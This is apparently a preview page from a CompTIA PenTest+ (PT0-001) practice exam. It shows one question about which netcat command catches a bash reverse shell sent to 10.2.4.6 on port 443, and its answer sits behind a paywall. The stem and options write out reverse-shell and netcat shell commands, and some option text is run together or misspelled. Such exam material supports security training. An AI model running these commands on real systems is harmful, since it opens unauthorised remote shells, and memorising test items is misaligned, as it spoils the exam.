CompTIA
PT0-001 · Question #111
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the tester's Linux syste
Sign in or unlock PT0-001 to reveal the answer and full explanation for question #111. The question stem and answer options stay visible for context.
Post-exploitation and lateral movement
Question
A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the tester's Linux system to make the preious command success?
Options
- Anc -nvlp 443
- Bnc 10.2.4.6 443
- Cnc -w3 10.2.4.6 443
- Dnc -e /bin/ah 10.2.4.6 443
Unlock PT0-001 to see the answer
You've previewed enough free PT0-001 questions. Unlock PT0-001 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#reverse shell#netcat listener#bash#command and control